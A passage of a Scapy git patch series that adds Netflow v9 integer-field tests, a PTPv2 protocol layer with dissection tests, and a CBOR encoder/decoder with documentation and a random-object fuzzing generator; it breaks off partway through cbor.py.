pkt.getlayer(NetflowDataflowsetV9, i).records[0].IN_PKTS == 0 assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].PROTOCOL == 6 assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].IPV4_SRC_ADDR == "192.168.0.10" assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].IPV4_DST_ADDR == "192.168.0.11" @@ -430,8 +430,8 @@ dataFS = NetflowDataflowsetV9( templateID=256, records=[ # Some random data. recordClass( - IN_BYTES=b"\x12", - IN_PKTS=b"\0\0\0\0", + IN_BYTES=0x12, + IN_PKTS=0, PROTOCOL=6, IPV4_SRC_ADDR="192.168.0.10", IPV4_DST_ADDR="192.168.0.11" @@ -442,6 +442,47 @@ dataFS = NetflowDataflowsetV9( pkt = netflow_header / flowset / dataFS assert raw(pkt) == b'\x00\n\x00>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' += Netflow9 - Build and dissect more int fields + +template_flowset = NetflowFlowsetV9( + flowSetID=0, + templates=[ + NetflowTemplateV9( + templateID=256, + fieldCount=5, + template_fields=[ + NetflowTemplateFieldV9(fieldType="IN_BYTES", fieldLength=4), + NetflowTemplateFieldV9(fieldType="IN_PKTS", fieldLength=4), + NetflowTemplateFieldV9(fieldType="PROTOCOL", fieldLength=1), + NetflowTemplateFieldV9(fieldType="IPV4_SRC_ADDR", fieldLength=4), + NetflowTemplateFieldV9(fieldType="IPV4_DST_ADDR", fieldLength=4), + ] + ) + ] +) +recordClass = GetNetflowRecordV9(template_flowset) +dataflowset = NetflowDataflowsetV9( + templateID=256, + records=[ + recordClass( + IN_BYTES=0x1234, + IN_PKTS=0xABC, + PROTOCOL=6, + IPV4_SRC_ADDR="192.168.0.10", + IPV4_DST_ADDR="192.168.0.11" + ), + ], +) + +assert bytes(dataflowset) == b'\x01\x00\x00\x18\x00\x00\x124\x00\x00\n\xbc\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00\x00' + +# Re-dissect after build +dataflowset = NetflowDataflowsetV9(bytes(dataflowset)) +rec = recordClass(dataflowset.records[0].fieldValue) +assert rec.IN_BYTES == 0x1234 +assert rec.IN_PKTS == 0xABC +assert rec.IPV4_SRC_ADDR == "192.168.0.10" + = NetflowSession - dissect packet NetflowV9 packets on-the-flow import os From e986fbc34fa45cb558684eeccca191e2f96c3e03 Mon Sep 17 00:00:00 2001 From: Satveer Brar Date: Tue, 17 Mar 2026 16:40:00 -0400 Subject: [PATCH 1613/1632] Feature/add-ptp-protocol (#4640) * Add support for PTP protocol based on IEEE 1588-2008 * Move PTPv2 protocol to scapy.contrib --- scapy/contrib/ptp_v2.py | 163 ++++++++++++++++++++++++++++++++++++++++ test/contrib/ptp_v2.uts | 99 ++++++++++++++++++++++++ 2 files changed, 262 insertions(+) create mode 100644 scapy/contrib/ptp_v2.py create mode 100644 test/contrib/ptp_v2.uts diff --git a/scapy/contrib/ptp_v2.py b/scapy/contrib/ptp_v2.py new file mode 100644 index 00000000000..a9dbbe0297a --- /dev/null +++ b/scapy/contrib/ptp_v2.py @@ -0,0 +1,163 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi +# Copyright (C) Satveer Brar + +# scapy.contrib.description = Precision Time Protocol v2 +# scapy.contrib.status = loads + +""" +PTP (Precision Time Protocol). +References : IEEE 1588-2008 +""" + +import struct + +from scapy.packet import Packet, bind_layers +from scapy.fields import ( + BitEnumField, + BitField, + ByteField, + IntField, + LongField, + ShortField, + ByteEnumField, + FlagsField, + XLongField, + XByteField, + ConditionalField, +) +from scapy.layers.inet import UDP + + +############################################################################# +# PTPv2 +############################################################################# + +# IEEE 1588-2008 / Section 13.3.2.2 + +_message_type = { + 0x0: "Sync", + 0x1: "Delay_Req", + 0x2: "Pdelay_Req", + 0x3: "Pdelay_Resp", + 0x4: "Reserved", + 0x5: "Reserved", + 0x6: "Reserved", + 0x7: "Reserved", + 0x8: "Follow_Up", + 0x9: "Delay_Resp", + 0xA: "Pdelay_Resp_Follow", + 0xB: "Announce", + 0xC: "Signaling", + 0xD: "Management", + 0xE: "Reserved", + 0xF: "Reserved" +} + +_control_field = { + 0x00: "Sync", + 0x01: "Delay_Req", + 0x02: "Follow_Up", + 0x03: "Delay_Resp", + 0x04: "Management", + 0x05: "All others", +} + +_flags = { + 0x0001: "alternateMasterFlag", + 0x0002: "twoStepFlag", + 0x0004: "unicastFlag", + 0x0010: "ptpProfileSpecific1", + 0x0020: "ptpProfileSpecific2", + 0x0040: "reserved", + 0x0100: "leap61", + 0x0200: "leap59", + 0x0400: "currentUtcOffsetValid", + 0x0800: "ptpTimescale", + 0x1000: "timeTraceable", + 0x2000: "frequencyTraceable" +} + + +class PTP(Packet): + """ + PTP packet based on IEEE 1588-2008 / Section 13.3 + """ + + name = "PTP" + match_subclass = True + fields_desc = [ + BitField("transportSpecific", 0, 4), + BitEnumField("messageType", 0x0, 4, _message_type), + BitField("reserved1", 0, 4), + BitField("version", 2, 4), + ShortField("messageLength", None), + ByteField("domainNumber", 0), + ByteField("reserved2", 0), + FlagsField("flags", 0, 16, _flags), + LongField("correctionField", 0), + IntField("reserved3", 0), + XLongField("clockIdentity", 0), + ShortField("portNumber", 0), + ShortField("sequenceId", 0), + ByteEnumField("controlField", 0, _control_field), + ByteField("logMessageInterval", 0), + ConditionalField(BitField("originTimestamp_seconds", 0, 48), + lambda pkt: pkt.messageType in [0x0, 0x1, 0x2, 0xB]), + ConditionalField(IntField("originTimestamp_nanoseconds", 0), + lambda pkt: pkt.messageType in [0x0, 0x1, 0x2, 0xB]), + ConditionalField(BitField("preciseOriginTimestamp_seconds", 0, 48), + lambda pkt: pkt.messageType == 0x8), + ConditionalField(IntField("preciseOriginTimestamp_nanoseconds", 0), + lambda pkt: pkt.messageType == 0x8), + ConditionalField(BitField("requestReceiptTimestamp_seconds", 0, 48), + lambda pkt: pkt.messageType == 0x3), + ConditionalField(IntField("requestReceiptTimestamp_nanoseconds", 0), + lambda pkt: pkt.messageType == 0x3), + ConditionalField(BitField("receiveTimestamp_seconds", 0, 48), + lambda pkt: pkt.messageType == 0x9), + ConditionalField(IntField("receiveTimestamp_nanoseconds", 0), + lambda pkt: pkt.messageType == 0x9), + ConditionalField(BitField("responseOriginTimestamp_seconds", 0, 48), + lambda pkt: pkt.messageType == 0xA), + ConditionalField(IntField("responseOriginTimestamp_nanoseconds", 0), + lambda pkt: pkt.messageType == 0xA), + ConditionalField(ShortField("currentUtcOffset", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(ByteField("reserved4", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(ByteField("grandmasterPriority1", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(ByteField("grandmasterClockClass", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(XByteField("grandmasterClockAccuracy", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(ShortField("grandmasterClockVariance", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(ByteField("grandmasterPriority2", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(XLongField("grandmasterIdentity", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(ShortField("stepsRemoved", 0), + lambda pkt: pkt.messageType == 0xB), + ConditionalField(XByteField("timeSource", 0), + lambda pkt: pkt.messageType == 0xB) + + ] + + def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes + """ + Update the messageLength field after building the packet + """ + if self.messageLength is None: + pkt = pkt[:2] + struct.pack("!H", len(pkt)) + pkt[4:] + + return pkt + pay + + +# Layer bindings + +bind_layers(UDP, PTP, sport=319, dport=319) +bind_layers(UDP, PTP, sport=320, dport=320) diff --git a/test/contrib/ptp_v2.uts b/test/contrib/ptp_v2.uts new file mode 100644 index 00000000000..f06fbfb82d7 --- /dev/null +++ b/test/contrib/ptp_v2.uts @@ -0,0 +1,99 @@ +% PTP regression tests for Scapy + +# +# Type the following command to launch the tests: +# $ test/run_tests -P "load_contrib('ptp_v2')" -t test/contrib/ptp_v2.uts + ++ Basic tests + += specific haslayer and getlayer implementations for PTP +~ haslayer getlayer PTP +pkt = IP() / UDP() / PTP() +assert PTP in pkt +assert pkt.haslayer(PTP) +assert isinstance(pkt[PTP], PTP) +assert isinstance(pkt.getlayer(PTP), PTP) + ++ Packet dissection tests + += Sync packet dissection +s = b'\x10\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x00\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.transportSpecific == 1 +assert pkt.messageType == 0 +assert pkt.reserved1 == 0 +assert pkt.version == 2 +assert pkt.messageLength == 44 +assert pkt.domainNumber == 123 +assert pkt.reserved2 == 0 +assert pkt.flags == None +assert pkt.correctionField == 0 +assert pkt.reserved3 == 0 +assert pkt.clockIdentity == 0x8063ffff0009ba +assert pkt.portNumber == 1 +assert pkt.sequenceId == 116 +assert pkt.controlField == 0 +assert pkt.logMessageInterval == 0 +assert pkt.originTimestamp_seconds == 1169232218 +assert pkt.originTimestamp_nanoseconds == 174389936 + += Delay_Req packet dissection +s= b'\x11\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x01\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.messageType == 0x1 +assert pkt.controlField == 0x1 + += Pdelay_Req packet dissection +s= b'\x12\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x05\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.messageType == 0x2 +assert pkt.controlField == 0x5 + += Pdelay_Resp packet dissection +s= b'\x13\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x05\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.messageType == 0x3 +assert pkt.controlField == 0x5 +assert pkt.requestReceiptTimestamp_seconds == 1169232218 +assert pkt.requestReceiptTimestamp_nanoseconds == 174389936 + += Follow_Up packet dissection +s= b'\x18\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x02\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.messageType == 0x8 +assert pkt.controlField == 0x2 +assert pkt.preciseOriginTimestamp_seconds == 1169232218 +assert pkt.preciseOriginTimestamp_nanoseconds == 174389936 + += Delay_Resp packet dissection +s= b'\x19\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x03\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.messageType == 0x9 +assert pkt.controlField == 0x3 +assert pkt.receiveTimestamp_seconds == 1169232218 +assert pkt.receiveTimestamp_nanoseconds == 174389936 + += Pdelay_Resp_Follow packet dissection +s= b'\x1A\x02\x00\x2c\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x05\x00\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0' +pkt = PTP(s) +assert pkt.messageType == 0xA +assert pkt.controlField == 0x5 +assert pkt.responseOriginTimestamp_seconds == 1169232218 +assert pkt.responseOriginTimestamp_nanoseconds == 174389936 + += Announce packet dissection +s= b'\x1b\x02\x00\x40\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\x00\x01\x00\x74\x05\x01\x00\x00\x45\xb1\x11\x5a\x0a\x64\xfa\xb0\x00\x00\x00\x60\x00\x00\x00\x80\x63\xff\xff\x00\x09\xba\xf8\x21\x00\x00\x80\x80' +pkt = PTP(s) +assert pkt.messageType == 0xB +assert pkt.messageLength == 64 +assert pkt.controlField == 0x5 +assert pkt.currentUtcOffset == 0 +assert pkt.reserved4 == 0 +assert pkt.grandmasterPriority1 == 96 +assert pkt.grandmasterClockClass == 0 +assert pkt.grandmasterClockAccuracy == 0x0 +assert pkt.grandmasterClockVariance == 128 +assert pkt.grandmasterPriority2 == 99 +assert pkt.grandmasterIdentity == 0xffff0009baf82100 +assert pkt.stepsRemoved == 128 +assert pkt.timeSource == 0x80 From 5b81ba107d9365cf5a40653c6b62882d1ac67b0f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 17 Mar 2026 23:19:36 +0100 Subject: [PATCH 1614/1632] Add CBOR implementation following the ASN.1 implementation paradigm (by Copilot) (#4916) * Implement CBOR parser following ASN.1 paradigm Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> Address code review comments: improve error messages and implement proper half-float decoding Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> Add cbor2 interoperability tests (cbor2 used ONLY in tests) Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> Document cbor2 as test-only dependency in test file header Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> Add CBOR documentation to advanced_usage.rst following ASN.1 pattern Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> Add cbor2 to tox.ini testenv deps for CBOR interoperability tests Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> * Reorder imports in `cbor.py` and `cborcodec.py` for better organization; remove trailing whitespaces. * Add adapted tests from PR #4875 for CBOR encoding edge cases Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> * Remove `advanced_usage.rst` documentation. * Fix codacy issues * Fix UTF-8 encoding test failures on Windows by specifying encoding in file opens Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> * Reorganize imports in `cbor.py` to improve readability. * Add RandCBORObject for fuzzing and comprehensive unit tests Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> * Fix extremely slow CBOR fuzzing tests by optimizing recursive structure generation Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> * Fix syntax errors in CBOR unit tests by adding blank lines before assertions Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> * cleanup CBOR docs * fix flake8 * fix ci issues * Reformat CBOR code for improved readability and compliance with style guidelines. * Update import path in CBOR documentation for consistency * Update import path in `cbor.py` for consistency with module structure * Adjust warning level in CBOR logging and suppress additional Sphinx warnings --------- Co-authored-by: copilot-swe-agent[bot] <198982749+Copilot@users.noreply.github.com> Co-authored-by: polybassa <1676055+polybassa@users.noreply.github.com> Co-authored-by: Nils Weiss --- doc/scapy/advanced_usage/cbor.rst | 167 +++++ doc/scapy/conf.py | 2 +- scapy/cbor/__init__.py | 84 +++ scapy/cbor/cbor.py | 489 +++++++++++++++ scapy/cbor/cborcodec.py | 706 +++++++++++++++++++++ scapy/tools/UTscapy.py | 6 +- test/scapy/layers/cbor.uts | 994 ++++++++++++++++++++++++++++++ tox.ini | 1 + 8 files changed, 2445 insertions(+), 4 deletions(-) create mode 100644 doc/scapy/advanced_usage/cbor.rst create mode 100644 scapy/cbor/__init__.py create mode 100644 scapy/cbor/cbor.py create mode 100644 scapy/cbor/cborcodec.py create mode 100644 test/scapy/layers/cbor.uts diff --git a/doc/scapy/advanced_usage/cbor.rst b/doc/scapy/advanced_usage/cbor.rst new file mode 100644 index 00000000000..90f668e3a40 --- /dev/null +++ b/doc/scapy/advanced_usage/cbor.rst @@ -0,0 +1,167 @@ +CBOR +==== + +What is CBOR? +------------- + +.. note:: + + This section provides a practical introduction to CBOR from Scapy's perspective. For the complete specification, see RFC 8949. + +CBOR (Concise Binary Object Representation) is a data format whose goal is to provide a compact, self-describing binary data interchange format based on the JSON data model. It is defined in RFC 8949 and is designed to be small in code size, reasonably small in message size, and extensible without the need for version negotiation. + +CBOR provides basic data types including: + +* **Unsigned integers** (major type 0): Non-negative integers +* **Negative integers** (major type 1): Negative integers +* **Byte strings** (major type 2): Raw binary data +* **Text strings** (major type 3): UTF-8 encoded strings +* **Arrays** (major type 4): Ordered sequences of values +* **Maps** (major type 5): Unordered key-value pairs +* **Semantic tags** (major type 6): Tagged values with additional semantics +* **Simple values and floats** (major type 7): Booleans, null, undefined, and floating-point numbers + +Each CBOR data item begins with an initial byte that encodes the major type (in the top 3 bits) and additional information (in the low 5 bits). This design allows for compact encoding while maintaining self-describing properties. + +Scapy and CBOR +-------------- + + +Creating CBOR objects +^^^^^^^^^^^^^^^^^^^^^ + +CBOR objects can be easily created and composed:: + + >>> from scapy.cbor import CBOR_UNSIGNED_INTEGER, CBOR_TEXT_STRING, CBOR_BYTE_STRING, CBOR_ARRAY + >>> # Create basic types + >>> num = CBOR_UNSIGNED_INTEGER(42) + >>> text = CBOR_TEXT_STRING("Hello, CBOR!") + >>> data = CBOR_BYTE_STRING(b'\x01\x02\x03') + >>> + >>> # Create collections + >>> arr = CBOR_ARRAY([CBOR_UNSIGNED_INTEGER(1), + ... CBOR_UNSIGNED_INTEGER(2), + ... CBOR_TEXT_STRING("three")]) + >>> arr + , , ]]> + >>> + >>> # Create maps + >>> from scapy.cbor.cborcodec import CBORcodec_MAP + >>> mapping = {"name": "Alice", "age": 30, "active": True} + +Encoding and decoding +^^^^^^^^^^^^^^^^^^^^^ + +CBOR objects are encoded using their ``.enc()`` method. All codecs are referenced in the ``CBOR_Codecs`` object. The default codec is ``CBOR_Codecs.CBOR``:: + + >>> num = CBOR_UNSIGNED_INTEGER(42) + >>> encoded = bytes(num) + >>> encoded.hex() + '182a' + >>> + >>> # Decode back + >>> decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) + >>> decoded.val + 42 + >>> isinstance(decoded, CBOR_UNSIGNED_INTEGER) + True + +Encoding collections:: + + >>> from scapy.cbor import CBORcodec_ARRAY, CBORcodec_MAP + >>> # Encode an array + >>> encoded = CBORcodec_ARRAY.enc([1, 2, 3, 4, 5]) + >>> encoded.hex() + '850102030405' + >>> + >>> # Decode the array + >>> decoded, _ = CBOR_Codecs.CBOR.dec(encoded) + >>> [item.val for item in decoded.val] + [1, 2, 3, 4, 5] + >>> + >>> # Encode a map + >>> encoded = CBORcodec_MAP.enc({"x": 100, "y": 200}) + >>> decoded, _ = CBOR_Codecs.CBOR.dec(encoded) + >>> isinstance(decoded, CBOR_MAP) + True + +Working with different types +^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + +CBOR supports various data types:: + + >>> # Booleans + >>> true_val = CBOR_TRUE() + >>> false_val = CBOR_FALSE() + >>> bytes(true_val).hex() + 'f5' + >>> bytes(false_val).hex() + 'f4' + >>> + >>> # Null and undefined + >>> null_val = CBOR_NULL() + >>> undef_val = CBOR_UNDEFINED() + >>> bytes(null_val).hex() + 'f6' + >>> bytes(undef_val).hex() + 'f7' + >>> + >>> # Floating point + >>> float_val = CBOR_FLOAT(3.14159) + >>> bytes(float_val).hex() + 'fb400921f9f01b866e' + >>> + >>> # Negative integers + >>> neg = CBOR_NEGATIVE_INTEGER(-100) + >>> bytes(neg).hex() + '3863' + +Complex structures +^^^^^^^^^^^^^^^^^^ + +CBOR supports nested structures:: + + >>> # Nested arrays + >>> nested = CBORcodec_ARRAY.enc([1, [2, 3], [4, [5, 6]]]) + >>> decoded, _ = CBOR_Codecs.CBOR.dec(nested) + >>> isinstance(decoded, CBOR_ARRAY) + True + >>> + >>> # Complex maps with mixed types + >>> data = { + ... "name": "Bob", + ... "age": 25, + ... "active": True, + ... "tags": ["user", "admin"] + ... } + >>> encoded = CBORcodec_MAP.enc(data) + >>> decoded, _ = CBOR_Codecs.CBOR.dec(encoded) + >>> len(decoded.val) + 4 + +Semantic tags +^^^^^^^^^^^^^ + +CBOR supports semantic tags (major type 6) for providing additional meaning to data items:: + + >>> # Tag 1 is for Unix epoch timestamps + >>> import time + >>> timestamp = int(time.time()) + >>> tagged = CBOR_SEMANTIC_TAG((1, CBOR_UNSIGNED_INTEGER(timestamp))) + >>> encoded = bytes(tagged) + >>> decoded, _ = CBOR_Codecs.CBOR.dec(encoded) + >>> decoded.val[0] # Tag number + 1 + + +Error handling +^^^^^^^^^^^^^^ + +Scapy provides safe decoding with error handling:: + + >>> # Safe decoding returns error objects for invalid data + >>> invalid_data = b'\xff\xff\xff' + >>> obj, remainder = CBOR_Codecs.CBOR.safedec(invalid_data) + >>> isinstance(obj, CBOR_DECODING_ERROR) + True + diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 04d54f9aef4..4f0603971db 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -194,4 +194,4 @@ 'Miscellaneous'), ] -suppress_warnings = ["app.add_directive"] \ No newline at end of file +suppress_warnings = ["app.add_directive", "ref.python"] \ No newline at end of file diff --git a/scapy/cbor/__init__.py b/scapy/cbor/__init__.py new file mode 100644 index 00000000000..de462e74528 --- /dev/null +++ b/scapy/cbor/__init__.py @@ -0,0 +1,84 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +Package holding CBOR (Concise Binary Object Representation) related modules. +Follows the same paradigm as ASN.1 implementation. +""" + +from scapy.cbor.cbor import ( + CBOR_Error, + CBOR_Encoding_Error, + CBOR_Decoding_Error, + CBOR_BadTag_Decoding_Error, + CBOR_Codecs, + CBOR_MajorTypes, + CBOR_Object, + CBOR_UNSIGNED_INTEGER, + CBOR_NEGATIVE_INTEGER, + CBOR_BYTE_STRING, + CBOR_TEXT_STRING, + CBOR_ARRAY, + CBOR_MAP, + CBOR_SEMANTIC_TAG, + CBOR_SIMPLE_VALUE, + CBOR_FALSE, + CBOR_TRUE, + CBOR_NULL, + CBOR_UNDEFINED, + CBOR_FLOAT, + CBOR_DECODING_ERROR, + RandCBORObject, +) + +from scapy.cbor.cborcodec import ( + CBORcodec_Object, + CBORcodec_UNSIGNED_INTEGER, + CBORcodec_NEGATIVE_INTEGER, + CBORcodec_BYTE_STRING, + CBORcodec_TEXT_STRING, + CBORcodec_ARRAY, + CBORcodec_MAP, + CBORcodec_SEMANTIC_TAG, + CBORcodec_SIMPLE_AND_FLOAT, +) + +__all__ = [ + # Exceptions + "CBOR_Error", + "CBOR_Encoding_Error", + "CBOR_Decoding_Error", + "CBOR_BadTag_Decoding_Error", + # Codecs + "CBOR_Codecs", + "CBOR_MajorTypes", + # Objects + "CBOR_Object", + "CBOR_UNSIGNED_INTEGER", + "CBOR_NEGATIVE_INTEGER", + "CBOR_BYTE_STRING", + "CBOR_TEXT_STRING", + "CBOR_ARRAY", + "CBOR_MAP", + "CBOR_SEMANTIC_TAG", + "CBOR_SIMPLE_VALUE", + "CBOR_FALSE", + "CBOR_TRUE", + "CBOR_NULL", + "CBOR_UNDEFINED", + "CBOR_FLOAT", + "CBOR_DECODING_ERROR", + # Random/Fuzzing + "RandCBORObject", + # Codec classes + "CBORcodec_Object", + "CBORcodec_UNSIGNED_INTEGER", + "CBORcodec_NEGATIVE_INTEGER", + "CBORcodec_BYTE_STRING", + "CBORcodec_TEXT_STRING", + "CBORcodec_ARRAY", + "CBORcodec_MAP", + "CBORcodec_SEMANTIC_TAG", + "CBORcodec_SIMPLE_AND_FLOAT", +] diff --git a/scapy/cbor/cbor.py b/scapy/cbor/cbor.py new file mode 100644 index 00000000000..5588dba664d --- /dev/null +++ b/scapy/cbor/cbor.py @@ -0,0 +1,489 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +CBOR (Concise Binary Object Representation) - RFC 8949 +Following the ASN.1 paradigm +""" + +import random +from typing import ( + Any, + Dict, + Generic, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, + cast, + TYPE_CHECKING, +) + +from scapy.compat import plain_str +from scapy.error import Scapy_Exception, log_runtime +from scapy.utils import Enum_metaclass, EnumElement +from scapy.volatile import RandField + +if TYPE_CHECKING: + from scapy.cbor import CBORcodec_Object + + +class RandCBORObject(RandField["CBOR_Object[Any]"]): + """Random CBOR object generator for fuzzing""" + + def __init__(self, objlist=None): + # type: (Optional[List[Type[CBOR_Object[Any]]]]) -> None + if objlist: + self.objlist = objlist + else: + # Default list will be populated lazily to avoid forward reference + self.objlist = None # type: ignore + self.chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" # noqa: E501 + + def _get_objlist(self): + # type: () -> List[Type[CBOR_Object[Any]]] + """Get the list of CBOR object types (lazy initialization)""" + if self.objlist is None: + # Import here to avoid circular dependency + self.objlist = [ + CBOR_UNSIGNED_INTEGER, + CBOR_NEGATIVE_INTEGER, + CBOR_BYTE_STRING, + CBOR_TEXT_STRING, + CBOR_ARRAY, + CBOR_MAP, + CBOR_FALSE, + CBOR_TRUE, + CBOR_NULL, + CBOR_UNDEFINED, + CBOR_FLOAT, + ] + return self.objlist + + def _fix(self, n=0): + # type: (int) -> CBOR_Object[Any] + objlist = self._get_objlist() + + # If we're at max recursion depth and have arrays/maps in objlist, + # filter them out to avoid infinite recursion + if n >= 10: + objlist = [o for o in objlist if o not in [CBOR_ARRAY, CBOR_MAP]] + if not objlist: + # Fallback to a simple type + return CBOR_UNSIGNED_INTEGER( + abs(int(random.gauss(1000, 2000)))) + + o = random.choice(objlist) + + if o == CBOR_UNSIGNED_INTEGER: + # Random unsigned integer using gaussian distribution + return o(abs(int(random.gauss(1000, 2000)))) + elif o == CBOR_NEGATIVE_INTEGER: + # Random negative integer - ensure it's always negative + return o(-abs(int(random.gauss(1000, 2000))) - 1) + elif o == CBOR_BYTE_STRING: + # Random byte string with exponential length + length = int(random.expovariate(0.05) + 1) + return o(bytes(random.randint(0, 255) for _ in range(length))) + elif o == CBOR_TEXT_STRING: + # Random text string with exponential length + length = int(random.expovariate(0.05) + 1) + return o( + "".join(random.choice(self.chars) for _ in range(length))) + elif o == CBOR_ARRAY: + # Random array with random elements (limit recursion depth) + # Use smaller size and limit depth more aggressively for performance + size = min(int(random.expovariate(0.2) + 1), 3) # Smaller arrays + + # Get child objlist - use simple types if current list only has + # recursive types + child_objlist = self._get_objlist() + non_recursive = [ + t for t in child_objlist if t not in [CBOR_ARRAY, CBOR_MAP]] + + # If objlist only contains recursive types or we're deep, use simple + # types for children + if not non_recursive or n >= 3: + child_objlist = [ + CBOR_UNSIGNED_INTEGER, CBOR_TEXT_STRING, CBOR_NULL] + + return o([self.__class__(objlist=child_objlist)._fix(n + 1) + for _ in range(size)]) + elif o == CBOR_MAP: + # Random map with random key-value pairs (limit recursion depth) + # CBOR maps use raw Python values as keys, CBOR objects as values + # Use smaller size and limit depth more aggressively for + # performance + size = min(int(random.expovariate(0.2) + 1), 3) # Smaller maps + + # Get child objlist - use simple types if current list only has + # recursive types + child_objlist = self._get_objlist() + non_recursive = [ + t for t in child_objlist if t not in [CBOR_ARRAY, CBOR_MAP]] + + # If objlist only contains recursive types or we're deep, + # use simple types for children + if not non_recursive or n >= 3: + child_objlist = [ + CBOR_UNSIGNED_INTEGER, CBOR_TEXT_STRING, CBOR_NULL] + + map_dict = {} + for _ in range(size): + # Use simple hashable types for keys (int or str) + if random.choice([True, False]): + key = abs(int(random.gauss(100, 200))) + else: + key_len = int(random.expovariate(0.1) + 1) + key = "".join(random.choice(self.chars) for _ in range(key_len)) # noqa: E501 + val_obj = self.__class__(objlist=child_objlist)._fix(n + 1) + map_dict[key] = val_obj + return o(map_dict) + elif o == CBOR_FALSE: + return o() + elif o == CBOR_TRUE: + return o() + elif o == CBOR_NULL: + return o() + elif o == CBOR_UNDEFINED: + return o() + elif o == CBOR_FLOAT: + # Random float with gaussian distribution + return o(random.gauss(0, 1000.0)) + + # Default fallback to unsigned integer + return CBOR_UNSIGNED_INTEGER( + abs(int(random.gauss(1000, 2000)))) + + +############## +# CBOR # +############## + + +class CBOR_Error(Scapy_Exception): + pass + + +class CBOR_Encoding_Error(CBOR_Error): + pass + + +class CBOR_Decoding_Error(CBOR_Error): + pass + + +class CBOR_BadTag_Decoding_Error(CBOR_Decoding_Error): + pass + + +class CBORCodec(EnumElement): + def register_stem(cls, stem): + # type: (Type[CBORcodec_Object[Any]]) -> None + cls._stem = stem + + def dec(cls, s, context=None): + # type: (bytes, Optional[Any]) -> CBOR_Object[Any] + return cls._stem.dec(s, context=context) # type: ignore + + def safedec(cls, s, context=None): + # type: (bytes, Optional[Any]) -> CBOR_Object[Any] + return cls._stem.safedec(s, context=context) # type: ignore + + def get_stem(cls): + # type: () -> type + return cls._stem + + +class CBOR_Codecs_metaclass(Enum_metaclass): + element_class = CBORCodec + + +class CBOR_Codecs(metaclass=CBOR_Codecs_metaclass): + CBOR = cast(CBORCodec, 1) + + +class CBORTag(EnumElement): + """Represents a CBOR major type""" + + def __init__(self, + key, # type: str + 